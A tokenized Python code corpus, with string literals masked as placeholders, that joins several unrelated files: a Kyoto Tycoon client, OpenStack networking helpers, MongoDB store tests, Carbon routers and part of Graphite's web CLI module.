LOGIC ) <EOL> return False <EOL> path = '<STR_LIT>' <EOL> if db : <EOL> path += '<STR_LIT>' + db <EOL> request_dict = { '<STR_LIT:key>' : key } <EOL> if old_val : <EOL> request_dict [ '<STR_LIT>' ] = urllib . quote ( self . pack ( old_val ) , safe = '<STR_LIT>' ) <EOL> if new_val : <EOL> request_dict [ '<STR_LIT>' ] = urllib . quote ( self . pack ( new_val ) , safe = '<STR_LIT>' ) <EOL> if expire : <EOL> request_dict [ '<STR_LIT>' ] = expire <EOL> request_body = self . _dict_to_tsv ( request_dict ) <EOL> self . conn . request ( '<STR_LIT:POST>' , path , body = request_body , <EOL> headers = KT_HTTP_HEADER ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return False <EOL> self . err . set_success ( ) <EOL> return True <EOL> def remove ( self , key , db ) : <EOL> if key is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return False <EOL> if db : <EOL> key = '<STR_LIT>' % ( db , key ) <EOL> key = urllib . quote ( key . encode ( '<STR_LIT>' ) , safe = '<STR_LIT>' ) <EOL> self . conn . request ( '<STR_LIT>' , key ) <EOL> rv = self . conn . getresponse ( ) <EOL> body = rv . read ( ) <EOL> if rv . status != <NUM_LIT> : <EOL> self . err . set_error ( self . err . NOTFOUND ) <EOL> return False <EOL> self . err . set_success ( ) <EOL> return True <EOL> def replace ( self , key , value , expire , db ) : <EOL> if key is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return False <EOL> if db : <EOL> key = '<STR_LIT>' % ( db , key ) <EOL> key = urllib . quote ( key . encode ( '<STR_LIT>' ) , safe = '<STR_LIT>' ) <EOL> value = self . pack ( value ) <EOL> status = self . _rest_put ( '<STR_LIT:replace>' , key , value , expire ) <EOL> if status != <NUM_LIT> : <EOL> self . err . set_error ( self . err . NOTFOUND ) <EOL> return False <EOL> self . err . 
set_success ( ) <EOL> return True <EOL> def append ( self , key , value , expire , db ) : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> if key is None : <EOL> return False <EOL> elif not isinstance ( value , str ) : <EOL> return False <EOL> if self . pack_type == KT_PACKER_PICKLE : <EOL> data = self . get ( key ) <EOL> if data is None : <EOL> data = value <EOL> else : <EOL> data = data + value <EOL> if self . set ( key , data , expire , db ) is True : <EOL> self . err . set_success ( ) <EOL> return True <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return False <EOL> def increment ( self , key , delta , expire , db ) : <EOL> if key is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return False <EOL> path = '<STR_LIT>' <EOL> if db : <EOL> path += '<STR_LIT>' + db <EOL> delta = int ( delta ) <EOL> request_body = '<STR_LIT>' % ( key , delta ) <EOL> self . conn . request ( '<STR_LIT:POST>' , path , body = request_body , <EOL> headers = KT_HTTP_HEADER ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return None <EOL> self . err . set_success ( ) <EOL> return int ( self . _tsv_to_dict ( body ) [ '<STR_LIT>' ] ) <EOL> def increment_double ( self , key , delta , expire , db ) : <EOL> if key is None : <EOL> self . err . set_error ( self . err . LOGIC ) <EOL> return False <EOL> path = '<STR_LIT>' <EOL> if db : <EOL> path += '<STR_LIT>' + db <EOL> delta = float ( delta ) <EOL> request_body = '<STR_LIT>' % ( key , delta ) <EOL> self . conn . request ( '<STR_LIT:POST>' , path , body = request_body , <EOL> headers = KT_HTTP_HEADER ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return None <EOL> self . err . set_success ( ) <EOL> return float ( self . 
_tsv_to_dict ( body ) [ '<STR_LIT>' ] ) <EOL> def report ( self ) : <EOL> self . conn . request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return None <EOL> self . err . set_success ( ) <EOL> return self . _tsv_to_dict ( body ) <EOL> def status ( self , db = None ) : <EOL> url = '<STR_LIT>' <EOL> if db : <EOL> db = urllib . quote ( db , safe = '<STR_LIT>' ) <EOL> url += '<STR_LIT>' + db <EOL> self . conn . request ( '<STR_LIT:GET>' , url ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return None <EOL> self . err . set_success ( ) <EOL> return self . _tsv_to_dict ( body ) <EOL> def clear ( self , db = None ) : <EOL> url = '<STR_LIT>' <EOL> if db : <EOL> db = urllib . quote ( db , safe = '<STR_LIT>' ) <EOL> url += '<STR_LIT>' + db <EOL> self . conn . request ( '<STR_LIT:GET>' , url ) <EOL> res = self . conn . getresponse ( ) <EOL> body = res . read ( ) <EOL> if res . status != <NUM_LIT:200> : <EOL> self . err . set_error ( self . err . EMISC ) <EOL> return False <EOL> self . err . set_success ( ) <EOL> return True <EOL> def count ( self , db = None ) : <EOL> st = self . status ( db ) <EOL> if st is None : <EOL> return None <EOL> return int ( st [ '<STR_LIT:count>' ] ) <EOL> def size ( self , db = None ) : <EOL> st = self . status ( db ) <EOL> if st is None : <EOL> return None <EOL> return int ( st [ '<STR_LIT:size>' ] ) <EOL> def _dict_to_tsv ( self , dict ) : <EOL> return '<STR_LIT:\n>' . join ( k + '<STR_LIT:\t>' + str ( v ) for ( k , v ) in dict . items ( ) ) <EOL> def _tsv_to_dict ( self , tsv_str ) : <EOL> rv = { } <EOL> for row in tsv_str . split ( '<STR_LIT:\n>' ) : <EOL> kv = row . 
split ( '<STR_LIT:\t>' ) <EOL> if len ( kv ) == <NUM_LIT:2> : <EOL> rv [ kv [ <NUM_LIT:0> ] ] = kv [ <NUM_LIT:1> ] <EOL> return rv <EOL> def _rest_put ( self , operation , key , value , expire ) : <EOL> headers = { '<STR_LIT>' : operation } <EOL> if expire != None : <EOL> expire = int ( time . time ( ) ) + expire ; <EOL> headers [ "<STR_LIT>" ] = str ( expire ) <EOL> self . conn . request ( '<STR_LIT>' , key , value , headers ) <EOL> rv = self . conn . getresponse ( ) <EOL> body = rv . read ( ) <EOL> return rv . status <EOL> def _pickle_packer ( self , data ) : <EOL> return pickle . dumps ( data , self . pickle_protocol ) <EOL> def _pickle_unpacker ( self , data ) : <EOL> return pickle . loads ( data ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from nova import compute <EOL> from occi_os_api . nova_glue import vm <EOL> NETWORK_API = compute . API ( ) . network_api <EOL> LOG = logging . getLogger ( __name__ ) <EOL> def get_network_details ( uid , context ) : <EOL> """<STR_LIT>""" <EOL> vm_instance = vm . get_vm ( uid , context ) <EOL> result = { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] } <EOL> try : <EOL> net_info = NETWORK_API . get_instance_nw_info ( context , vm_instance ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> LOG . warn ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return result <EOL> gw = net_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ '<STR_LIT:address>' ] <EOL> mac = net_info [ '<STR_LIT:address>' ] <EOL> if len ( net_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) == <NUM_LIT:0> : <EOL> tmp = { '<STR_LIT>' : [ ] , '<STR_LIT:address>' : '<STR_LIT>' } <EOL> else : <EOL> tmp = net_info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> for item in tmp [ '<STR_LIT>' ] : <EOL> result [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT:address>' : item [ '<STR_LIT:address>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> result [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : mac , <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT:address>' : tmp [ '<STR_LIT:address>' ] , <EOL> '<STR_LIT>' : gw , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> return result <EOL> def add_floating_ip ( uid , pool_name , context ) : <EOL> """<STR_LIT>""" <EOL> vm_instance = vm . get_vm ( uid , context ) <EOL> tmp = NETWORK_API . get_instance_nw_info ( context , vm_instance ) [ <NUM_LIT:0> ] <EOL> fixed_ip = tmp . fixed_ips ( ) [ <NUM_LIT:0> ] [ '<STR_LIT:address>' ] <EOL> float_address = NETWORK_API . 
allocate_floating_ip ( context , pool_name ) <EOL> try : <EOL> address = fixed_ip <EOL> NETWORK_API . associate_floating_ip ( context , vm_instance , <EOL> float_address , address ) <EOL> except Exception as e : <EOL> raise AttributeError ( e . message ) <EOL> return float_address <EOL> def remove_floating_ip ( uid , address , context ) : <EOL> """<STR_LIT>""" <EOL> vm_instance = vm . get_vm ( uid , context ) <EOL> try : <EOL> NETWORK_API . disassociate_floating_ip ( context , vm_instance , address ) <EOL> NETWORK_API . release_floating_ip ( context , address ) <EOL> except Exception as e : <EOL> raise AttributeError ( e . message ) </s>
<s> """<STR_LIT>""" <EOL> from dtrace import DTraceConsumer <EOL> SCRIPT = '<STR_LIT>' <EOL> def my_walk ( action , identifier , key , values ) : <EOL> """<STR_LIT>""" <EOL> print key <EOL> for item in values : <EOL> if item [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] > <NUM_LIT:0> and item [ <NUM_LIT:1> ] > <NUM_LIT:0> : <EOL> print '<STR_LIT>' % ( item [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] , item [ <NUM_LIT:1> ] ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> consumer = DTraceConsumer ( walk_func = my_walk ) <EOL> consumer . run ( SCRIPT , <NUM_LIT:10> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import mox <EOL> import unittest <EOL> from pymongo import MongoClient <EOL> from pymongo . collection import Collection <EOL> from pymongo . database import Database <EOL> from suricate . data import object_store <EOL> class ObjectStoreTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_for_failure ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( NotImplementedError , <EOL> object_store . ObjectStore ( ) . list_objects , <EOL> '<STR_LIT>' , '<STR_LIT:abc>' ) <EOL> self . assertRaises ( NotImplementedError , <EOL> object_store . ObjectStore ( ) . create_object , <EOL> '<STR_LIT>' , '<STR_LIT:abc>' , '<STR_LIT:foo>' ) <EOL> self . assertRaises ( NotImplementedError , <EOL> object_store . ObjectStore ( ) . retrieve_object , <EOL> '<STR_LIT>' , '<STR_LIT:abc>' , '<STR_LIT:abc>' ) <EOL> self . assertRaises ( NotImplementedError , <EOL> object_store . ObjectStore ( ) . update_object , <EOL> '<STR_LIT>' , '<STR_LIT:abc>' , '<STR_LIT:abc>' , '<STR_LIT:bar>' ) <EOL> self . assertRaises ( NotImplementedError , <EOL> object_store . ObjectStore ( ) . delete_object , <EOL> '<STR_LIT>' , '<STR_LIT:abc>' , '<STR_LIT:abc>' ) <EOL> class MongoStoreTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> mocker = mox . Mox ( ) <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . cut = Wrapper ( '<STR_LIT>' , <NUM_LIT> , '<STR_LIT:foo>' ) <EOL> self . mongo_client = self . mocker . CreateMock ( MongoClient ) <EOL> self . mongo_db = self . mocker . CreateMock ( Database ) <EOL> self . mongo_coll = self . mocker . CreateMock ( Collection ) <EOL> self . cut . client = self . mongo_client <EOL> def test_list_objects_for_sanity ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mongo_client . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_db ) <EOL> self . mongo_db . authenticate ( '<STR_LIT>' , '<STR_LIT:abc>' ) <EOL> self . mongo_db . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . 
mongo_coll ) <EOL> self . mongo_coll . find ( { } ) . AndReturn ( [ { '<STR_LIT>' : '<STR_LIT:foo>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ ] } , <EOL> '<STR_LIT:content>' : '<STR_LIT:bar>' } ] ) <EOL> self . mocker . ReplayAll ( ) <EOL> tmp = self . cut . list_objects ( '<STR_LIT>' , '<STR_LIT:abc>' ) <EOL> self . mocker . VerifyAll ( ) <EOL> self . assertListEqual ( tmp , [ ( '<STR_LIT:foo>' , { '<STR_LIT>' : [ ] } ) ] ) <EOL> def test_create_object_for_sanity ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mongo_client . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_db ) <EOL> self . mongo_db . authenticate ( '<STR_LIT>' , '<STR_LIT:abc>' ) <EOL> self . mongo_db . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_coll ) <EOL> self . mongo_coll . insert ( { '<STR_LIT:value>' : { '<STR_LIT:foo>' : '<STR_LIT:bar>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : [ ] , <EOL> '<STR_LIT:name>' : '<STR_LIT:foo>' } } ) . AndReturn ( '<STR_LIT>' ) <EOL> self . mocker . ReplayAll ( ) <EOL> tmp = self . cut . create_object ( '<STR_LIT>' , '<STR_LIT:abc>' , { '<STR_LIT:foo>' : '<STR_LIT:bar>' } , <EOL> meta = { '<STR_LIT>' : [ ] , '<STR_LIT:name>' : '<STR_LIT:foo>' } ) <EOL> self . mocker . VerifyAll ( ) <EOL> self . assertEquals ( tmp , '<STR_LIT>' ) <EOL> def test_retrieve_object_for_sanity ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mongo_client . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_db ) <EOL> self . mongo_db . authenticate ( '<STR_LIT>' , '<STR_LIT:abc>' ) <EOL> self . mongo_db . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_coll ) <EOL> self . mongo_coll . find_one ( mox . IsA ( dict ) ) . AndReturn ( { '<STR_LIT>' : None , <EOL> '<STR_LIT:value>' : <EOL> { '<STR_LIT:foo>' : '<STR_LIT:bar>' } } ) <EOL> self . mocker . ReplayAll ( ) <EOL> tmp = self . cut . retrieve_object ( '<STR_LIT>' , '<STR_LIT:abc>' , <EOL> '<STR_LIT>' ) <EOL> self . mocker . VerifyAll ( ) <EOL> self . 
assertEquals ( tmp , { '<STR_LIT:value>' : { '<STR_LIT:foo>' : '<STR_LIT:bar>' } } ) <EOL> def test_update_object_for_sanity ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mongo_client . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_db ) <EOL> self . mongo_db . authenticate ( '<STR_LIT>' , '<STR_LIT:abc>' ) <EOL> self . mongo_db . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_coll ) <EOL> self . mongo_coll . update ( mox . IsA ( dict ) , mox . IsA ( dict ) , upsert = False ) <EOL> self . mocker . ReplayAll ( ) <EOL> self . cut . update_object ( '<STR_LIT>' , '<STR_LIT:abc>' , '<STR_LIT>' , <EOL> { '<STR_LIT:a>' : <NUM_LIT> } ) <EOL> self . mocker . VerifyAll ( ) <EOL> def test_delete_object_for_sanity ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mongo_client . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_db ) <EOL> self . mongo_db . authenticate ( '<STR_LIT>' , '<STR_LIT:abc>' ) <EOL> self . mongo_db . __getitem__ ( '<STR_LIT>' ) . AndReturn ( self . mongo_coll ) <EOL> self . mongo_coll . remove ( mox . IsA ( dict ) ) <EOL> self . mocker . ReplayAll ( ) <EOL> self . cut . delete_object ( '<STR_LIT>' , '<STR_LIT:abc>' , '<STR_LIT>' ) <EOL> self . mocker . VerifyAll ( ) <EOL> class CDMIStoreTest ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_sth_for_success ( self ) : <EOL> pass <EOL> class Wrapper ( object_store . MongoStore ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , host , port , uri ) : <EOL> pass </s>
<s> import imp <EOL> from carbon . relayrules import loadRelayRules <EOL> from carbon . hashing import ConsistentHashRing <EOL> class DatapointRouter : <EOL> "<STR_LIT>" <EOL> def addDestination ( self , destination ) : <EOL> "<STR_LIT>" <EOL> def removeDestination ( self , destination ) : <EOL> "<STR_LIT>" <EOL> def getDestinations ( self , key ) : <EOL> """<STR_LIT>""" <EOL> class RelayRulesRouter ( DatapointRouter ) : <EOL> def __init__ ( self , rules_path ) : <EOL> self . rules_path = rules_path <EOL> self . rules = loadRelayRules ( rules_path ) <EOL> self . destinations = set ( ) <EOL> def addDestination ( self , destination ) : <EOL> self . destinations . add ( destination ) <EOL> def removeDestination ( self , destination ) : <EOL> self . destinations . discard ( destination ) <EOL> def getDestinations ( self , key ) : <EOL> for rule in self . rules : <EOL> if rule . matches ( key ) : <EOL> for destination in rule . destinations : <EOL> if destination in self . destinations : <EOL> yield destination <EOL> if not rule . continue_matching : <EOL> return <EOL> class ConsistentHashingRouter ( DatapointRouter ) : <EOL> def __init__ ( self , replication_factor = <NUM_LIT:1> ) : <EOL> self . replication_factor = int ( replication_factor ) <EOL> self . instance_ports = { } <EOL> self . ring = ConsistentHashRing ( [ ] ) <EOL> def addDestination ( self , destination ) : <EOL> ( server , port , instance ) = destination <EOL> if ( server , instance ) in self . instance_ports : <EOL> raise Exception ( "<STR_LIT>" % ( server , instance ) ) <EOL> self . instance_ports [ ( server , instance ) ] = port <EOL> self . ring . add_node ( ( server , instance ) ) <EOL> def removeDestination ( self , destination ) : <EOL> ( server , port , instance ) = destination <EOL> if ( server , instance ) not in self . instance_ports : <EOL> raise Exception ( "<STR_LIT>" % ( server , instance ) ) <EOL> del self . instance_ports [ ( server , instance ) ] <EOL> self . ring . 
remove_node ( ( server , instance ) ) <EOL> def getDestinations ( self , metric ) : <EOL> key = self . getKey ( metric ) <EOL> used_servers = set ( ) <EOL> for ( server , instance ) in self . ring . get_nodes ( key ) : <EOL> if server in used_servers : <EOL> continue <EOL> else : <EOL> used_servers . add ( server ) <EOL> port = self . instance_ports [ ( server , instance ) ] <EOL> yield ( server , port , instance ) <EOL> if len ( used_servers ) >= self . replication_factor : <EOL> return <EOL> def getKey ( self , metric ) : <EOL> return metric <EOL> def setKeyFunction ( self , func ) : <EOL> self . getKey = func <EOL> def setKeyFunctionFromModule ( self , keyfunc_spec ) : <EOL> module_path , func_name = keyfunc_spec . rsplit ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> module_file = open ( module_path , '<STR_LIT>' ) <EOL> description = ( '<STR_LIT>' , '<STR_LIT>' , imp . PY_SOURCE ) <EOL> module = imp . load_module ( '<STR_LIT>' , module_file , module_path , description ) <EOL> keyfunc = getattr ( module , func_name ) <EOL> self . setKeyFunction ( keyfunc ) </s>
<s> """<STR_LIT>""" <EOL> import sys , os , urllib , time , traceback , cgi , re , socket <EOL> from cPickle import load , dump <EOL> from itertools import chain <EOL> from django . conf import settings <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> from graphite . util import getProfile , getProfileByUsername <EOL> from graphite . logger import log <EOL> from graphite . account . models import Profile , MyGraph , Variable , View , Window <EOL> def printException ( ) : <EOL> out = "<STR_LIT>" <EOL> out += traceback . format_exc ( ) <EOL> out += "<STR_LIT>" <EOL> return stdout ( out ) <EOL> def stdout ( text , lineBreak = True ) : <EOL> text = text . replace ( '<STR_LIT:">' , "<STR_LIT:'>" ) <EOL> text = text . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> br = '<STR_LIT>' <EOL> if lineBreak : br = "<STR_LIT>" <EOL> return """<STR_LIT>""" % ( text , br ) <EOL> def stderr ( text ) : <EOL> return """<STR_LIT>""" % text . replace ( '<STR_LIT:">' , "<STR_LIT:'>" ) <EOL> def _set ( request , name , value ) : <EOL> profile = getProfile ( request ) <EOL> try : <EOL> variable = profile . variable_set . get ( name = name ) <EOL> variable . value = value <EOL> except ObjectDoesNotExist : <EOL> variable = Variable ( profile = profile , name = name , value = value ) <EOL> variable . save ( ) <EOL> return '<STR_LIT>' <EOL> def _unset ( request , name ) : <EOL> profile = getProfile ( request ) <EOL> try : <EOL> variable = profile . variable_set . get ( name = name ) <EOL> variable . delete ( ) <EOL> except ObjectDoesNotExist : <EOL> return stderr ( "<STR_LIT>" % name ) <EOL> return '<STR_LIT>' <EOL> def _echo ( request , args ) : <EOL> return stdout ( args ) <EOL> def _vars ( request ) : <EOL> profile = getProfile ( request ) <EOL> out = '<STR_LIT>' <EOL> for variable in profile . variable_set . all ( ) : <EOL> out += '<STR_LIT>' % ( variable . name , variable . 
value ) <EOL> out += '<STR_LIT>' <EOL> return stdout ( out ) <EOL> def _clear ( request ) : <EOL> return "<STR_LIT>" <EOL> def _create ( request , window ) : <EOL> out = '<STR_LIT>' <EOL> w = window . replace ( '<STR_LIT:.>' , '<STR_LIT:_>' ) <EOL> out += "<STR_LIT>" % ( w , w , w ) <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" % ( w , w ) <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % ( w , w , w ) <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % ( w , w ) <EOL> return out <EOL> def _draw ( request , targets , _from = None , until = None , template = None , window = None , interval = None ) : <EOL> out = '<STR_LIT>' <EOL> params = [ ( '<STR_LIT:target>' , t ) for t in targets ] <EOL> if _from : params . append ( ( '<STR_LIT>' , _from ) ) <EOL> if until : params . append ( ( '<STR_LIT>' , until ) ) <EOL> if template : params . append ( ( '<STR_LIT>' , template ) ) <EOL> url = '<STR_LIT>' + urllib . 
urlencode ( params ) <EOL> if window : <EOL> w = window <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % url <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> if interval : <EOL> i = int ( interval ) <EOL> out += "<STR_LIT>" % ( w , i ) <EOL> out += "<STR_LIT>" % ( w , w , w ) <EOL> else : <EOL> return stdout ( "<STR_LIT>" % url ) <EOL> return out <EOL> def _redraw ( request , window , interval ) : <EOL> out = '<STR_LIT>' <EOL> w = window <EOL> i = int ( interval ) <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % ( w , w ) <EOL> out += "<STR_LIT>" % ( w , i ) <EOL> out += "<STR_LIT>" % ( w , w , w ) <EOL> out += "<STR_LIT>" <EOL> return out <EOL> def _email ( request , window , addressList ) : <EOL> out = '<STR_LIT>' <EOL> w = window <EOL> addrList = '<STR_LIT:U+002C>' . join ( addressList ) <EOL> params = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : addrList , '<STR_LIT:title>' : w } <EOL> paramStr = urllib . urlencode ( params ) <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % paramStr <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> return out <EOL> def _doemail ( request ) : <EOL> cgiParams = request . GET <EOL> assert '<STR_LIT>' in cgiParams and '<STR_LIT:url>' in cgiParams and '<STR_LIT:title>' in cgiParams , "<STR_LIT>" <EOL> import smtplib , httplib , urlparse <EOL> from email . MIMEMultipart import MIMEMultipart <EOL> from email . MIMEText import MIMEText <EOL> from email . 
MIMEImage import MIMEImage <EOL> url = cgiParams [ '<STR_LIT:url>' ] <EOL> title = cgiParams [ '<STR_LIT:title>' ] <EOL> recipients = cgiParams [ '<STR_LIT>' ] . split ( '<STR_LIT:U+002C>' ) <EOL> proto , server , path , query , frag = urlparse . urlsplit ( url ) <EOL> if query : path += '<STR_LIT:?>' + query <EOL> conn = httplib . HTTPConnection ( server ) <EOL> conn . request ( '<STR_LIT:GET>' , path ) <EOL> resp = conn . getresponse ( ) <EOL> assert resp . status == <NUM_LIT:200> , "<STR_LIT>" % ( resp . status , resp . reason ) <EOL> rawData = resp . read ( ) <EOL> conn . close ( ) <EOL> message = MIMEMultipart ( ) <EOL> message [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> message [ '<STR_LIT>' ] = '<STR_LIT:U+002CU+0020>' . join ( recipients ) <EOL> message [ '<STR_LIT>' ] = '<STR_LIT>' % socket . gethostname ( ) <EOL> text = MIMEText ( "<STR_LIT>" % ( time . ctime ( ) , url ) ) <EOL> image = MIMEImage ( rawData ) <EOL> image . add_header ( '<STR_LIT>' , '<STR_LIT>' , filename = title + time . strftime ( "<STR_LIT>" ) ) <EOL> message . attach ( text ) <EOL> message . attach ( image ) <EOL> server = smtplib . SMTP ( settings . SMTP_SERVER ) <EOL> server . sendmail ( '<STR_LIT>' % socket . gethostname ( ) , recipients , message . as_string ( ) ) <EOL> server . quit ( ) <EOL> return stdout ( "<STR_LIT>" % ( url , cgiParams [ '<STR_LIT>' ] ) ) <EOL> def _code ( request , code ) : <EOL> return code <EOL> def _url ( request , window ) : <EOL> out = '<STR_LIT>' <EOL> w = window <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % w <EOL> out += "<STR_LIT>" <EOL> return out <EOL> def _help ( request ) : <EOL> return "<STR_LIT>" % settings . 
DOCUMENTATION_URL <EOL> def _change ( request , window , var , value ) : <EOL> out = '<STR_LIT>' <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % var <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % value <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % ( var , value ) <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> if window == '<STR_LIT:*>' : <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> else : <EOL> out += "<STR_LIT>" % window <EOL> return out <EOL> def _add ( request , target , window ) : <EOL> out = '<STR_LIT>' <EOL> out += "<STR_LIT>" % window <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % window <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % target <EOL> out += "<STR_LIT>" <EOL> return out <EOL> def _remove ( request , target , window ) : <EOL> out = '<STR_LIT>' <EOL> out += "<STR_LIT>" % window <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % window <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % target <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" % target <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> out += "<STR_LIT>" <EOL> return out <EOL> def _find ( request , pattern ) : <EOL> pattern = pattern . strip ( ) <EOL> r = re . compile ( pattern , re . I ) <EOL> out = '<STR_LIT>' <EOL> found = <NUM_LIT:0> <EOL> displayMax = <NUM_LIT:100> <EOL> rrdIndex = open ( settings . 
